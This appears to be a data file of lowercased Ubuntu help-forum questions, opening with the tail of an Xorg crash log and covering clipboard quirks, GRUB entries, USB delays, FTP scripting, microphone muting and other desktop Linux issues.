[ 49.507 ] compiled for 1.8.99.905 , module version = 1.3.2 [ 49.507 ] module class : x.org video driver [ 49.507 ] abi class : x.org video driver , version 8.0 [ 49.507 ] ( ii ) loadmodule : `` ark '' [ 49.507 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ark_drv.so [ 49.508 ] ( ii ) module ark : vendor= '' x.org foundation '' [ 49.508 ] compiled for 1.8.99.905 , module version = 0.7.2 [ 49.508 ] module class : x.org video driver [ 49.508 ] abi class : x.org video driver , version 8.0 [ 49.508 ] ( ii ) loadmodule : `` radeon '' [ 49.508 ] ( ii ) loading /usr/lib/xorg/modules/drivers/radeon_drv.so [ 49.511 ] ( ii ) module radeon : vendor= '' x.org foundation '' [ 49.511 ] compiled for 1.9.0 , module version = 6.13.1 [ 49.511 ] module class : x.org video driver [ 49.511 ] abi class : x.org video driver , version 8.0 [ 49.512 ] ( ii ) loadmodule : `` tseng '' [ 49.512 ] ( ii ) loading /usr/lib/xorg/modules/drivers/tseng_drv.so [ 49.521 ] ( ii ) module tseng : vendor= '' x.org foundation '' [ 49.521 ] compiled for 1.8.99.905 , module version = 1.1.0 [ 49.521 ] module class : x.org video driver [ 49.521 ] abi class : x.org video driver , version 8.0 [ 49.521 ] ( ii ) loadmodule : `` savage '' [ 49.521 ] ( ii ) loading /usr/lib/xorg/modules/drivers/savage_drv.so [ 49.522 ] ( ii ) module savage : vendor= '' x.org foundation '' [ 49.522 ] compiled for 1.8.99.905 , module version = 2.3.1 [ 49.522 ] module class : x.org video driver [ 49.522 ] abi class : x.org video driver , version 8.0 [ 49.522 ] ( ii ) loadmodule : `` rendition '' [ 49.522 ] ( ii ) loading /usr/lib/xorg/modules/drivers/rendition_drv.so [ 49.523 ] ( ii ) module rendition : vendor= '' x.org foundation '' [ 49.523 ] compiled for 1.8.99.905 , module version = 4.2.4 [ 49.523 ] module class : x.org video driver [ 49.523 ] abi class : x.org video driver , version 8.0 [ 49.523 ] ( ii ) loadmodule : `` chips '' [ 49.523 ] ( ii ) loading /usr/lib/xorg/modules/drivers/chips_drv.so [ 49.524 ] ( ii ) module chips : vendor= '' x.org foundation '' [ 49.524 ] compiled for 1.8.99.905 , module version = 1.2.3 [ 49.524 ] module class : x.org video driver [ 49.524 ] abi class : x.org video driver , version 8.0 [ 49.524 ] ( ii ) loadmodule : `` voodoo '' [ 49.524 ] ( ii ) loading /usr/lib/xorg/modules/drivers/voodoo_drv.so [ 49.525 ] ( ii ) module voodoo : vendor= '' x.org foundation '' [ 49.525 ] compiled for 1.8.99.905 , module version = 1.1.0 [ 49.525 ] module class : x.org video driver [ 49.525 ] abi class : x.org video driver , version 8.0 [ 49.525 ] ( ii ) loadmodule : `` mga '' [ 49.525 ] ( ii ) loading /usr/lib/xorg/modules/drivers/mga_drv.so [ 49.526 ] ( ii ) module mga : vendor= '' x.org foundation '' [ 49.526 ] compiled for 1.8.99.905 , module version = 1.4.11 [ 49.526 ] module class : x.org video driver [ 49.526 ] abi class : x.org video driver , version 8.0 [ 49.526 ] ( ii ) loadmodule : `` trident '' [ 49.526 ] ( ii ) loading /usr/lib/xorg/modules/drivers/trident_drv.so [ 49.527 ] ( ii ) module trident : vendor= '' x.org foundation '' [ 49.527 ] compiled for 1.8.99.905 , module version = 1.3.4 [ 49.527 ] module class : x.org video driver [ 49.527 ] abi class : x.org video driver , version 8.0 [ 49.527 ] ( ii ) loadmodule : `` nv '' [ 49.527 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nv_drv.so [ 49.528 ] ( ii ) module nv : vendor= '' x.org foundation '' [ 49.528 ] compiled for 1.8.99.905 , module version = 2.1.17 [ 49.528 ] module class : x.org video driver [ 49.528 ] abi class : x.org video driver , version 8.0 [ 49.528 ] ( ii ) loadmodule : `` intel '' [ 49.529 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 49.530 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 49.530 ] compiled for 1.9.0 , module version = 2.12.0 [ 49.530 ] module class : x.org video driver [ 49.530 ] abi class : x.org video driver , version 8.0 [ 49.530 ] ( ii ) loadmodule : `` i128 '' [ 49.530 ] ( ii ) loading /usr/lib/xorg/modules/drivers/i128_drv.so [ 49.531 ] ( ii ) module i128 : vendor= '' x.org foundation '' [ 49.531 ] compiled for 1.8.99.905 , module version = 1.3.3 [ 49.531 ] module class : x.org video driver [ 49.531 ] abi class : x.org video driver , version 8.0 [ 49.531 ] ( ii ) loadmodule : `` siliconmotion '' [ 49.531 ] ( ii ) loading /usr/lib/xorg/modules/drivers/siliconmotion_drv.so [ 49.532 ] ( ii ) module siliconmotion : vendor= '' x.org foundation '' [ 49.532 ] compiled for 1.8.99.905 , module version = 1.7.4 [ 49.532 ] module class : x.org video driver [ 49.532 ] abi class : x.org video driver , version 8.0 [ 49.532 ] ( ii ) loadmodule : `` mach64 '' [ 49.533 ] ( ii ) loading /usr/lib/xorg/modules/drivers/mach64_drv.so [ 49.534 ] ( ii ) module mach64 : vendor= '' x.org foundation '' [ 49.534 ] compiled for 1.8.99.905 , module version = 6.8.2 [ 49.534 ] module class : x.org video driver [ 49.534 ] abi class : x.org video driver , version 8.0 [ 49.534 ] ( ii ) loadmodule : `` vmware '' [ 49.534 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vmware_drv.so [ 49.535 ] ( ii ) module vmware : vendor= '' x.org foundation '' [ 49.535 ] compiled for 1.8.99.905 , module version = 11.0.1 [ 49.535 ] module class : x.org video driver [ 49.535 ] abi class : x.org video driver , version 8.0 [ 49.535 ] ( ii ) loadmodule : `` vmwgfx '' [ 49.535 ] ( ww ) warning , could n't open module vmwgfx [ 49.535 ] ( ii ) unloadmodule : `` vmwgfx '' [ 49.535 ] ( ee ) failed to load module `` vmwgfx '' ( module does not exist , 0 ) [ 49.535 ] ( ee ) vmware : please ignore the above warnings about not being able to to load module/driver vmwgfx [ 49.535 ] ( ii ) vmware : using vmwlegacy driver everything is fine . [ 49.535 ] ( ii ) loadmodule : `` vmwlegacy '' [ 49.535 ] ( ii ) reloading /usr/lib/xorg/modules/drivers/vmwlegacy_drv.so [ 49.535 ] ( ii ) unloadmodule : `` vmwlegacy '' [ 49.535 ] ( ii ) failed to load module `` vmwlegacy '' ( already loaded , 8232992 ) [ 49.535 ] ( ii ) loadmodule : `` ati '' [ 49.535 ] ( ii ) loading /usr/lib/xorg/modules/drivers/ati_drv.so [ 49.535 ] ( ii ) module ati : vendor= '' x.org foundation '' [ 49.535 ] compiled for 1.9.0 , module version = 6.13.1 [ 49.535 ] module class : x.org video driver [ 49.535 ] abi class : x.org video driver , version 8.0 [ 49.535 ] ( ii ) loadmodule : `` sis '' [ 49.536 ] ( ii ) loading /usr/lib/xorg/modules/drivers/sis_drv.so [ 49.538 ] ( ii ) module sis : vendor= '' x.org foundation '' [ 49.538 ] compiled for 1.8.99.905 , module version = 0.10.3 [ 49.538 ] module class : x.org video driver [ 49.538 ] abi class : x.org video driver , version 8.0 [ 49.538 ] ( ii ) loadmodule : `` sisusb '' [ 49.538 ] ( ii ) loading /usr/lib/xorg/modules/drivers/sisusb_drv.so [ 49.539 ] ( ii ) module sisusb : vendor= '' x.org foundation '' [ 49.539 ] compiled for 1.8.99.905 , module version = 0.9.4 [ 49.539 ] module class : x.org video driver [ 49.539 ] abi class : x.org video driver , version 8.0 [ 49.539 ] ( ii ) loadmodule : `` fglrx '' [ 49.539 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fglrx_drv.so [ 49.680 ] ( ii ) module fglrx : vendor= '' firegl - ati technologies inc. '' [ 49.691 ] compiled for 1.4.99.906 , module version = 8.78.30 [ 49.691 ] module class : x.org video driver [ 49.701 ] ( ii ) loading sub module `` fglrxdrm '' [ 49.701 ] ( ii ) loadmodule : `` fglrxdrm '' [ 49.701 ] ( ww ) warning , could n't open module fglrxdrm [ 49.701 ] ( ii ) unloadmodule : `` fglrxdrm '' [ 49.701 ] ( ee ) ca n't load firegl drm library ( libfglrxdrm.so ) . [ 49.701 ] ( ii ) loadmodule : `` s3 '' [ 49.701 ] ( ii ) loading /usr/lib/xorg/modules/drivers/s3_drv.so [ 49.702 ] ( ii ) module s3 : vendor= '' x.org foundation '' [ 49.702 ] compiled for 1.8.99.905 , module version = 0.6.3 [ 49.702 ] module class : x.org video driver [ 49.702 ] abi class : x.org video driver , version 8.0 [ 49.702 ] ( ii ) loadmodule : `` tdfx '' [ 49.702 ] ( ii ) loading /usr/lib/xorg/modules/drivers/tdfx_drv.so [ 49.703 ] ( ii ) module tdfx : vendor= '' x.org foundation '' [ 49.703 ] compiled for 1.8.99.905 , module version = 1.4.3 [ 49.703 ] module class : x.org video driver [ 49.703 ] abi class : x.org video driver , version 8.0 [ 49.703 ] ( ii ) loadmodule : `` fbdev '' [ 49.703 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 49.704 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 49.704 ] compiled for 1.8.99.905 , module version = 0.4.2 [ 49.704 ] abi class : x.org video driver , version 8.0 [ 49.704 ] ( ii ) loadmodule : `` vesa '' [ 49.704 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 49.704 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 49.704 ] compiled for 1.8.99.905 , module version = 2.3.0 [ 49.704 ] module class : x.org video driver [ 49.704 ] abi class : x.org video driver , version 8.0 [ 49.704 ] ( ww ) falling back to old probe method for apm [ 49.704 ] ( ww ) falling back to old probe method for neomagic [ 49.704 ] ( ww ) falling back to old probe method for s3virge [ 49.704 ] ( ww ) falling back to old probe method for cirrus [ 49.704 ] ( ii ) loading sub module `` cirrus_laguna '' [ 49.704 ] ( ii ) loadmodule : `` cirrus_laguna '' [ 49.704 ] ( ii ) loading /usr/lib/xorg/modules/drivers/cirrus_laguna.so [ 49.705 ] ( ii ) module cirrus_laguna : vendor= '' x.org foundation '' [ 49.705 ] compiled for 1.8.99.905 , module version = 1.0.0 [ 49.705 ] abi class : x.org video driver , version 8.0 [ 49.705 ] ( ii ) loading sub module `` cirrus_alpine '' [ 49.705 ] ( ii ) loadmodule : `` cirrus_alpine '' [ 49.705 ] ( ii ) loading /usr/lib/xorg/modules/drivers/cirrus_alpine.so [ 49.705 ] ( ii ) module cirrus_alpine : vendor= '' x.org foundation '' [ 49.705 ] compiled for 1.8.99.905 , module version = 1.0.0 [ 49.705 ] abi class : x.org video driver , version 8.0 [ 49.705 ] ( ww ) falling back to old probe method for ark [ 49.705 ] ( ww ) falling back to old probe method for tseng [ 49.705 ] ( ww ) falling back to old probe method for voodoo [ 49.705 ] ( ww ) falling back to old probe method for trident [ 49.705 ] ( ww ) falling back to old probe method for i128 [ 49.705 ] ( ww ) falling back to old probe method for siliconmotion [ 49.705 ] ( ww ) falling back to old probe method for sis [ 49.705 ] ( ww ) falling back to old probe method for sisusb [ 49.705 ] ( ww ) falling back to old probe method for fglrx [ 49.740 ] ( ii ) pcs database file /etc/ati/amdpcsdb not found [ 49.740 ] ( ii ) creating pcs database from initial defaults instead [ 49.740 ] ( ww ) falling back to old probe method for s3 [ 49.740 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 49.740 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 49.893 ] ( ++ ) using config file : `` /xorg.conf.new '' [ 49.893 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 49.893 ] ( == ) serverlayout `` x.org configured '' [ 49.893 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 49.893 ] ( ** ) | | -- > monitor `` monitor0 '' [ 49.893 ] ( ** ) | | -- > device `` card0 '' [ 49.893 ] ( ** ) | -- > input device `` mouse0 '' [ 49.893 ] ( ** ) | -- > input device `` keyboard0 '' [ 49.893 ] ( == ) automatically adding devices [ 49.894 ] ( == ) automatically enabling devices [ 49.894 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 49.894 ] entry deleted from font path . [ 49.894 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 49.894 ] entry deleted from font path . [ 49.894 ] ( ** ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins , /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 49.894 ] ( ** ) modulepath set to `` /usr/lib/xorg/modules '' [ 49.894 ] ( ww ) allowemptyinput is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 49.894 ] ( ww ) disabling mouse0 [ 49.894 ] ( ww ) disabling keyboard0 [ 49.894 ] ( ii ) loading sub module `` fbdevhw '' [ 49.894 ] ( ii ) loadmodule : `` fbdevhw '' [ 49.894 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 49.902 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 49.902 ] compiled for 1.9.0 , module version = 0.0.2 [ 49.902 ] abi class : x.org video driver , version 8.0 [ 49.902 ] ( ee ) open /dev/fb0 : no such file or directory [ 49.902 ] ( ww ) falling back to old probe method for fbdev [ 49.902 ] backtrace : [ 49.902 ] 0 : xorg ( xorg_backtrace+0x28 ) [ 0x4a0fa8 ] [ 49.902 ] 1 : xorg ( 0x400000+0x60fcd ) [ 0x460fcd ] [ 49.902 ] 2 : /lib/libpthread.so.0 ( 0x7f16ba4b6000+0xfb40 ) [ 0x7f16ba4c5b40 ] [ 49.902 ] segmentation fault at address ( nil ) [ 49.902 ] caught signal 11 ( segmentation fault ) . server aborting [ 49.902 ] please consult the the x.org foundation support at http : //wiki.x.org for help . [ 49.902 ] please also check the log file at `` /var/log/xorg.99.log '' for additional information . [ 49.902 ] any solution ?
12046	how to configure media player connectivity [ java app for firefox ]	i 've recently upgraded firefox . this is the error i receive at youtube : video player undefined for this type of media ( check tools menu , mediaplayerconnectivity ... ) application/x-shockwave-flash
12047	inconsistant copy and paste behaviour . is there a fix ?	i 've encountered what i can best describe as `` unpredictable '' behaviour of the `` clipboard '' . .. but in it 's own way , it actually is `` predictable '' '' , as it is not an x bug , as such . it largely results from different x applications using different x features in different ways ... but it does n't really help to know that it is n't `` actually '' a bug . becase it feels like a bug ! there is a list ( below ) of what i 've found / tested . is there some way ( a daemon ? ) , which irons out all these wrinkles ? i 'd prefer something that does n't sit in the panel . the x / ubuntu clipboard is potentially awsome , because of its 2/3 levels ability , but is a bit annoying because of the inconsinstant implememtations ... i 've been trying to understand why the copy/paste thing did n't always do what i expected ... it 's amazing what you can learn when you read the info docs : ) .. but a question can hit the target faster . the main issue seems to come about when the source application is shut down , and you try to access `` clipboard '' data which came from that app . x gui applicatons have 2 major copy/paste methods ( modes ) . mode name text copy method text paste method -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- - primary currently selected mouse middle-click clipboard control+c selection control+v i 've tested the behaviour of the selection modes for a few different x apps . ... gvim , gedit , firefox , gnome-terminal nb : all pasting was done into gedit ... ... the gedit source was from another ( root ) instance ) ... i 've tried a couple of `` managers '' .. parcelite and pastie . ... ... but ca n't see any point in comparing them , because neither address the problem . ... ... ie : normally expected copy / paste keyboard actions are `` inconsistant '' + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - + -- -- -- -- -- -- | modes used in the source application | availability upon closing the applicaton | application + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - + -- -- -- -- -- -- | -- - no manager -- - | primary only , no clipboard copy/cut used : | primary empty ! ( previous ) clipboard ok | ( all tested ) | | -- | | clipboard as last action ( implicit primary ) : | primary empty ! clipboard empty ! | gvim | | primary empty ! clipboard ok | gedit , gnome-terminal | | primary empty ! clipboard empty ! | firefox | | -- | | primary as last action , preceded by clipboard | primary ok clipboard empty ! | gvim | | primary empty ! clipboard ok | gedit , gnome-terminal | | primary empty ! clipboard empty ! | firefox | -- - manager : parcelite -- - | primary only , no clipboard copy/cut used : | primary ok ( previous ) clipboard ok | ( all tested ) | | -- | | clipboard as last action ( implicit primary ) : | primary ok clipboard empty ! | gvim , firefox | | primary ok clipboard ok | gedit , gnome-terminal | | -- | | primary as last action , preceded by clipboard | primary ok clipboard empty ! | gvim , firefox | | primary ok clipboard ok | gedit , gnome-terminal | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - + -- -- -- -- -- --
12053	removing blue link borders around pictures in html emails in evolution	sorry for the long title . so i have created an html signature file that i want to use in evolution . i created it using kompozer . i have several images that link to webpages and i made sure in kompozer and in firefox that there is no link borders around these images . when i load the file as my signature file in evolution it also does not show any link borders , actually it does n't show the pictures at all , but when i send an email with the signature , the person who gets the email always gets those ugly blue link borders around the graphics . i have sent test email s to gmail and yahoo ! mail accounts and i see it in both of them . does anyone know a way i can prevent evolution from doing this . any advice gladly welcome
12054	docky make the icon jump when it needs attention	i wonder if there 's any possibility to make icons in docky jump when in need of attention .
12055	is there a tool to measure speed of your pc/laptop ?	in windows 7 there is a tool that calculates some kind of index of your machine : the performance index . i am not sure how it is done , but it is nice to know , to be able to compare machines . does anybody know of anything similar for ubuntu ?
12061	entry for grub1 on sda3 into the main grub2 on sda	i have ubuntu 10.10 on sda1 . archlinux with its bootloader , grub1 , on sda3 . ubuntu 's bootloader grub2 in on sda . how can i create an entry for sda3 grub1 in ubuntu 's sda grub2 . simply put , on bootup i should see grub2 first and it should have an entry for grub1 .
12065	usb mouse late to load	i was using 10.04 going into this weekend and , after a kernel update , i began to observe some unreliable usb behaviour : namely , my usb mouse is extremely late to the party ( usually turns on several seconds after login ) and my usb card reader pretty much is n't working at all . in the hopes of the latest and greatest taking care of it , and being in need of the switch to x64 , i upgraded to 10.10 and was disappointed to find that the problems are still here . i 'm not terribly familiar with ubuntu 's usb systems these days so i 'm asking the question : how do i begin to diagnose this issue ? update 1 : i 've added noapictimer and irqpoll to my kernel command . no change . update 2 : i 've unplugged all usb devices save for the mouse and the internal multi-card reader ( connected to one of the mainboard 's usb headers ) . the dmesg output below is the result . some relevant dmesg output : you can see how long it 's taking to bring the mouse online . $ dmesg | egrep `` hci|usb '' [ 0.711064 ] usbcore : registered new interface driver usbfs [ 0.711064 ] usbcore : registered new interface driver hub [ 0.711064 ] usbcore : registered new device driver usb [ 1.055260 ] ehci_hcd : usb 2.0 'enhanced ' host controller ( ehci ) driver [ 1.055298 ] ehci_hcd 0000:00:12.2 : pci int b - > gsi 17 ( level , low ) - > irq 17 [ 1.055318 ] ehci_hcd 0000:00:12.2 : ehci host controller [ 1.055355 ] ehci_hcd 0000:00:12.2 : new usb bus registered , assigned bus number 1 [ 1.055382 ] ehci_hcd 0000:00:12.2 : debug port 1 [ 1.055407 ] ehci_hcd 0000:00:12.2 : irq 17 , io mem 0xfe02c000 [ 1.060140 ] ehci_hcd 0000:00:12.2 : usb 2.0 started , ehci 1.00 [ 1.060335 ] ehci_hcd 0000:00:13.2 : pci int b - > gsi 19 ( level , low ) - > irq 19 [ 1.060347 ] ehci_hcd 0000:00:13.2 : ehci host controller [ 1.060373 ] ehci_hcd 0000:00:13.2 : new usb bus registered , assigned bus number 2 [ 1.060399 ] ehci_hcd 0000:00:13.2 : debug port 1 [ 1.060423 ] ehci_hcd 0000:00:13.2 : irq 19 , io mem 0xfe029000 [ 1.080132 ] ehci_hcd 0000:00:13.2 : usb 2.0 started , ehci 1.00 [ 1.080269 ] ohci_hcd : usb 1.1 'open ' host controller ( ohci ) driver [ 1.080317 ] ohci_hcd 0000:00:12.0 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 1.080330 ] ohci_hcd 0000:00:12.0 : ohci host controller [ 1.080351 ] ohci_hcd 0000:00:12.0 : new usb bus registered , assigned bus number 3 [ 1.080379 ] ohci_hcd 0000:00:12.0 : irq 16 , io mem 0xfe02e000 [ 1.144302 ] ohci_hcd 0000:00:12.1 : pci int a - > gsi 16 ( level , low ) - > irq 16 [ 1.144313 ] ohci_hcd 0000:00:12.1 : ohci host controller [ 1.144333 ] ohci_hcd 0000:00:12.1 : new usb bus registered , assigned bus number 4 [ 1.144348 ] ohci_hcd 0000:00:12.1 : irq 16 , io mem 0xfe02d000 [ 1.204319 ] ohci_hcd 0000:00:13.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 1.204331 ] ohci_hcd 0000:00:13.0 : ohci host controller [ 1.204353 ] ohci_hcd 0000:00:13.0 : new usb bus registered , assigned bus number 5 [ 1.204381 ] ohci_hcd 0000:00:13.0 : irq 18 , io mem 0xfe02b000 [ 1.264325 ] ohci_hcd 0000:00:13.1 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 1.264336 ] ohci_hcd 0000:00:13.1 : ohci host controller [ 1.264358 ] ohci_hcd 0000:00:13.1 : new usb bus registered , assigned bus number 6 [ 1.264373 ] ohci_hcd 0000:00:13.1 : irq 18 , io mem 0xfe02a000 [ 1.324323 ] ohci_hcd 0000:00:14.5 : pci int c - > gsi 18 ( level , low ) - > irq 18 [ 1.324335 ] ohci_hcd 0000:00:14.5 : ohci host controller [ 1.324361 ] ohci_hcd 0000:00:14.5 : new usb bus registered , assigned bus number 7 [ 1.324376 ] ohci_hcd 0000:00:14.5 : irq 18 , io mem 0xfe028000 [ 1.384279 ] uhci_hcd : usb universal host controller interface driver [ 1.435428 ] firewire_ohci 0000:03:0e.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 1.436716 ] ahci 0000:00:11.0 : version 3.0 [ 1.436730 ] ahci 0000:00:11.0 : pci int a - > gsi 22 ( level , low ) - > irq 22 [ 1.436827 ] ahci 0000:00:11.0 : ahci 0001.0100 32 slots 4 ports 3 gbps 0xf impl sata mode [ 1.436829 ] ahci 0000:00:11.0 : flags : 64bit ncq sntf ilck pm led clo pmp pio slum part ccc [ 1.438473 ] scsi2 : ahci [ 1.438554 ] scsi3 : ahci [ 1.438601 ] scsi4 : ahci [ 1.438638 ] scsi5 : ahci [ 1.440179 ] usb 2-6 : new high speed usb device using ehci_hcd and address 2 [ 1.490160 ] firewire_ohci : added fw-ohci device 0000:03:0e.0 , ohci v1.10 , 4 ir + 8 it contexts , quirks 0x2 [ 16.560107 ] usb 2-6 : device descriptor read/64 , error -110 [ 31.790134 ] usb 2-6 : device descriptor read/64 , error -110 [ 32.020129 ] usb 2-6 : new high speed usb device using ehci_hcd and address 3 [ 47.150111 ] usb 2-6 : device descriptor read/64 , error -110 [ 62.380130 ] usb 2-6 : device descriptor read/64 , error -110 [ 62.610125 ] usb 2-6 : new high speed usb device using ehci_hcd and address 4 [ 73.030125 ] usb 2-6 : device not accepting address 4 , error -110 [ 73.150122 ] usb 2-6 : new high speed usb device using ehci_hcd and address 5 [ 83.570186 ] usb 2-6 : device not accepting address 5 , error -110 [ 83.760195 ] usb 4-2 : new low speed usb device using ohci_hcd and address 2 [ 83.992508 ] usbcore : registered new interface driver hiddev [ 83.997139 ] input : microsoft microsoft 3-button mouse with intellieye ( tm ) as /devices/pci0000:00/0000:00:12.1/usb4/4-2/4-2:1.0/input/input3 [ 83.997357 ] generic-usb 0003:045e:0040.0001 : input , hidraw0 : usb hid v1.10 mouse [ microsoft microsoft 3-button mouse with intellieye ( tm ) ] on usb-0000:00:12.1-2/input0 [ 83.997402 ] usbcore : registered new interface driver usbhid [ 83.997408 ] usbhid : usb hid core driver [ 84.260207 ] usb 6-3 : new full speed usb device using ohci_hcd and address 2 [ 99.410194 ] usb 6-3 : device descriptor read/64 , error -110 [ 114.670184 ] usb 6-3 : device descriptor read/64 , error -110 [ 114.950222 ] usb 6-3 : new full speed usb device using ohci_hcd and address 3 [ 130.100199 ] usb 6-3 : device descriptor read/64 , error -110 [ 145.360206 ] usb 6-3 : device descriptor read/64 , error -110 [ 145.620188 ] usb 6-3 : new full speed usb device using ohci_hcd and address 4 [ 156.040197 ] usb 6-3 : device not accepting address 4 , error -110 [ 156.210204 ] usb 6-3 : new full speed usb device using ohci_hcd and address 5 [ 166.630203 ] usb 6-3 : device not accepting address 5 , error -110 and for the record . $ lsusb bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 045e:0040 microsoft corp. wheel mouse optical bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub the card reader is missing completely from the output above , unfortunately . it was working about 2 weeks ago , until a kernel update when i was running 10.04 .
12069	how to stop constantly blinking wifi led ?	i have a dell e6510 and after installing ubuntu and connecting to a wireless network , my wifi led keeps blinking all the time , probably in response to traffic . this is really annoying because it keeps drawing my attention away from the screen . is there any way to turn this functionality off and just let the wifi light stay on all the time as long as it has a wifi connection ? here is my lspci for the wifi : network controller : intel corporation centrino advanced-n 6200 ( rev 35 )
12077	display lag after installing driver	i never had any problem with display . this morning ubuntu gave me an option to install drivers for wireless card and nvidia drivers for display . there were two options for wireless driver and two options for nvidia display.. for nvidia driver one option was marked as recommended ( i remember installing this when i installled ubuntu ) , so today along with two wireless drivers ( broadcom ) drivers , i installed the other nvidia driver as well . after restarting i am seeing this lag which is quite irritating . is there anyway to rollback to previous configuration like windows ?
12079	windows ftp script download from ubuntu	i 'm using following ftp script on windows xp to download zip files from ubuntu cloud servers . a zip file is created every day on ubuntu servers and i will download it to windows via this ftp script . i run this script everyday manually as i have to edit the last line ( mget /usr/backup_02-11-2010.zip ) of the script to match today 's date . i want to edit this script so that it will download only today 's zip file at the scheduled time without needing to edit it everyday , when scheduled . it 's clear that date is appended to the zip files and is in the format dd-mm-yyyy . need help ... the file one.txt : open server-ip-here username-here user-password-here lcd c : \backup\files bin hash prompt mget /usr/backup_02-11-2010.zip the file one.bat : ftp -s : one.txt i will be executing one.bat file .
12085	banshee crashes while rescaning the library	everytime i try to make a rescan , banshee keeps crashing . the songs it was able to discover are added to library list on the next start up of banshee . then , it crashes again if i am to try rescan . any ideas ?
12098	what does outputting to /dev/null accomplish in bash scripts ?	oftentimes i run into small bash scripts that use this sort of syntax in if statements : '' some command '' > /dev/null 2 > & 1 what is the purpose of outputting to /dev/null like that , and what does the 2 > & 1 mean ? it always seems to work but i 'd like to know what its doing .
12100	keyboard shortcut/command to mute/unmute microphone	during voice conversations in skype/gmail/etc . i would like to mute/unmute the microphone without having to go through all these steps each time : sound indicator sound preferences select input mute/unmute the microphone i 'm looking for either : an application that can do this from the commandline , a way i can assign a keyboard shortcut that can mute/unmute the microphone
12106	what is the name of the package that allows you to connect to a windows machine over rdp ( remote desktop protocol )	i have ubuntu netbook with unity installed , and i do not see the program that allows you to connect to windows via rdp , i would like to be able to install this functionality , anyone know what the name of the package is ? thanks
12113	gnu screen : running commands in different window when screen is started	the .screenrc file allows the user to specify that they want multiple windows open when screen is first run . eg . screen -t mywindowa 0 `` '' screen -t mywindowb 1 `` - $ { shell } '' screen -t mywindowc 2 `` - $ { shell } '' what i would like is for each window to run some commands first , like : screen -t mywindowa 0 `` < go to directory a , source a.sh '' screen -t mywindowb 1 `` - $ { shell } < go to directory b , source b.sh > '' screen -t mywindowc 2 `` - $ { shell } < go to directoy c ; start a watch on `ls -l` > '' is there any way to do that ? note this is similar to , but different from this issue .
12114	is there a gui for opensync ?	every search for a graphical interface for opensync gives me outdated information . is this project still actively developed and is there any working gui in ubuntu 10.10 ? ( no , multisync-gui is not in the archives any more ! )
12118	how do i autoconnect to a wireless access point ?	how can i set my laptop with ubuntu 10.04 to autoconnect to wi-fi ( with pass , wpa2-personal ) , when i on my laptop without asking password on wi-fi ? i wont on my laptop and start surfing without enter pass of my wi-fi .
12129	how to install windows xp from ubuntu via usb	i need to install windows xp on my machine that currently runs ubuntu 10.10 . i have a slipstreamed iso for xp and only a usb to boot from . i do not have access to another windows machine , and my windows virtual machine does not recognise my usb drive . the solution needs to be purely linux-based .
12131	will canonical be dumping a standard file manager for non-root users in coming releases ?	just the title - are they really going to do that ?
12133	is there any way to set hardware profiles based on where i am at ?	like in windows xp you use to be able to create a new hard profile and then you select which one you want before windows boots . basically what i want to do is kill the screen saver when i go home , like when i am watching movies and it is not plugged in , so i do n't have to move the mouse every 5 mins or so .
12135	i failed to safely eject my usb drive and lost data ... how do i get it back ?	i have to admit i did n't `` safetly eject '' , but i have done this a million times ... what gives , and how do i get my data back ? ?
